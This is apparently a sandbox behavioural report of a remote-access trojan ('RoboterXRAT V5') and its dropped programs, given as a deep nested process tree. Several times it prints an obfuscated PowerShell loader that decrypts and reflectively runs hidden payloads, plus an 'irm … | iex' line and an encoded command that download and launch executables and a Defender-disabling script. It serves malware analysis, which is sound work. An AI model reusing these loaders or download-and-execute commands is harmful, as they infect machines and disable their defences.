C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"17⤵PID:168
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"18⤵
- Loads dropped DLL
PID:5932 -
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"19⤵PID:3588
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"20⤵PID:4380
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"21⤵PID:4544
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"22⤵PID:192
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"23⤵PID:3208
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"23⤵PID:5332
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"23⤵PID:5816
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"22⤵PID:5272
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"22⤵PID:4956
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"21⤵PID:5144
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"21⤵PID:2224
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"20⤵PID:2268
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"20⤵PID:3884
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid21⤵PID:2224
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"19⤵PID:5780
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"19⤵PID:1220
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"18⤵
- System Location Discovery: System Language Discovery
PID:5500
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"18⤵PID:4900
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"17⤵
- System Location Discovery: System Language Discovery
PID:5324
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"17⤵PID:5228
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid18⤵PID:4324
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV119⤵PID:2520
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"16⤵
- System Location Discovery: System Language Discovery
PID:5728
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"16⤵PID:2124
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid17⤵PID:5436
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"15⤵
- System Location Discovery: System Language Discovery
PID:2404
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"15⤵PID:1332
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid16⤵PID:5648
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV117⤵PID:5896
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"14⤵
- System Location Discovery: System Language Discovery
PID:3592
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"14⤵
- Blocklisted process makes network request
PID:5092 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid15⤵PID:4156
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵PID:4772
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"13⤵
- System Location Discovery: System Language Discovery
PID:4396
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"13⤵PID:4860
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid14⤵PID:2868
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"12⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1392
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"12⤵
- Executes dropped EXE
PID:1132 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid13⤵PID:3428
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"11⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2312
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"11⤵
- Executes dropped EXE
PID:2404
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3568
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"10⤵
- Executes dropped EXE
PID:3596
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "8⤵PID:828
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:1800
-
-
C:\Windows\system32\net.exenet file9⤵PID:2872
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file10⤵PID:4292
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));9⤵
- Command and Scripting Interpreter: PowerShell
PID:1888
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"8⤵
- Executes dropped EXE
PID:752 -
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"9⤵
- Executes dropped EXE
PID:1768
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4572
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"9⤵
- Executes dropped EXE
PID:64 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid10⤵PID:2716
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "7⤵PID:508
-
C:\Windows\system32\net.exenet file8⤵PID:820
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file9⤵PID:2004
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2952
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"7⤵
- Executes dropped EXE
PID:524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "6⤵
- Suspicious use of WriteProcessMemory
PID:4364 -
C:\Windows\system32\net.exenet file7⤵
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file8⤵PID:2124
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4168
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"7⤵
- Executes dropped EXE
PID:4860 -
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"8⤵
- Executes dropped EXE
PID:4456 -
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"9⤵
- Executes dropped EXE
PID:3876 -
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"10⤵
- Executes dropped EXE
PID:1528 -
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"11⤵
- Executes dropped EXE
PID:3660 -
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"12⤵
- Executes dropped EXE
PID:3020 -
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"13⤵PID:4564
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"14⤵PID:2196
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"14⤵
- System Location Discovery: System Language Discovery
PID:2780
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"14⤵PID:2592
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid15⤵PID:4280
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵PID:4788
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"13⤵
- System Location Discovery: System Language Discovery
PID:3720
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"13⤵PID:1152
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid14⤵PID:4892
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"12⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:800
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"12⤵
- Executes dropped EXE
PID:1648 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid13⤵PID:1152
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"11⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:824
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"11⤵
- Executes dropped EXE
PID:4192 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid12⤵PID:3228
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4448
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"10⤵
- Executes dropped EXE
PID:4896
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:704
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"9⤵
- Executes dropped EXE
PID:1624
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1036
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"8⤵
- Executes dropped EXE
PID:3660 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid9⤵PID:352
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3568
-
-
C:\Users\Admin\AppData\Local\Temp\sihost.exe"C:\Users\Admin\AppData\Local\Temp\sihost.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2312 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Windows\system32\net.exenet file6⤵
- Suspicious use of WriteProcessMemory
PID:4288 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file7⤵PID:2104
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
-
-
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"6⤵
- Executes dropped EXE
PID:5092
-
-
C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:960 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"7⤵
- System Location Discovery: System Language Discovery
PID:4432 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2004
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "irm rentry.co/microsoft-vir/raw | iex"8⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:208 -
C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"10⤵
- Executes dropped EXE
